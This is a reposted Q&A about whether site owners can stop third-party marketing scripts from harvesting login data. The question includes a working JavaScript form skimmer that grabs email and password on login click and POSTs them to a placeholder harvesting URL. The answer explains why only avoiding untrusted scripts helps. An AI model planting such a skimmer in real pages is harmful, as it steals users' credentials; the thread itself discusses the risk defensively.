Login Form Password Security

Question



If the following JavaScript code was added into the stackoverflow.com login page then each time a browser clicked login, the form data entered would be sent off to a third-party website via a POST request. I think this may be common on a lot of other websites as well. With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data? Can websites do anything to encrypt the password entered within the form box?

The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement. Can someone please help me understand if a more elegant solution exists?

const elementToTrack = document.querySelector('#submit-button');
elementToTrack.addEventListener('click', () => {
    getPW();
});

function getPW() {
    var data = new FormData(document.getElementById('login-form'));
    data = data.entries();
    var obj = data.next();
    var retrieved = {};
    while (undefined !== obj.value) {
        retrieved[obj.value[0]] = obj.value[1];
        obj = data.next();
    }

    let pw = retrieved.password;
    let email = retrieved.email;
    /* just using a placeholder url for illustrative purposes */
    fetch("https://somerandomserver.com/api/passwordHarvester", {
        method: "POST",
        body: JSON.stringify({
            email: email,
            password: pw
        }),
        headers: {
            "Content-type": "application/json; charset=UTF-8"
        }
    });
}

Answer 1

Score: 1


> With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data?

Only by not using them.

Loading and executing JavaScript from a URL under someone else's control gives them as much access to your page as any JS you write yourself has.

> Can websites do anything to encrypt the password entered within the form box?

No.

Browser built-in encryption only concerns itself with the HTTP requests and responses (i.e. HTTPS).

Anything you did with JavaScript would be subject to interference from or could be preempted by the third-party JS.

> The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement.

Since the JS is hosted by the third party, there would be nothing stopping them changing it after the review (or serving different JS based on the source IP, user-agent, or whatever).

huangapple
  • Posted on 2023-08-10 23:50:35
  • Please keep this link when reposting: https://go.coder-hub.com/76877384.html